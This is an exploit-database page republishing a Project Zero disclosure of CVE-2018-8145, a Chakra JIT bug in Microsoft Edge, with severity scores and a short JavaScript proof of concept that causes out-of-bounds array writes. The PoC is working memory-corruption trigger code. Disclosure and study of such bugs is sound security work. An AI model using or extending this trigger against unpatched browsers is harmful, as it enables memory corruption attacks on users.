Advertisement






Microsoft Edge Chakra JIT Out-Of-Bounds Reads/Writes

CVE Category Price Severity
CVE-2018-8145 CWE-119 $50,000 Critical
Author Risk Exploitation Type Date
Google Project Zero High Remote 2018-07-13
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.68047 0.93932

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018070137

Below is a copy:

Microsoft Edge Chakra JIT Out-Of-Bounds Reads/Writes
Microsoft Edge: Chakra: JIT: OOB reads/writes 

CVE-2018-8145


It seems that this issue is similar to the <a href="/p/project-zero/issues/detail?id=1429" title="Microsoft Edge: Chakra: JIT: Loop analysis bug" class="closed_ref" rel="nofollow"> issue 1429 </a> (MSRC 42111). It might need to refresh the page several times to observe a crash.

PoC:
let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
    for (let j = 0; j < 1; j++) {
        i--;
        i++;
    }

    arr[i] = 0x1234;
}


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.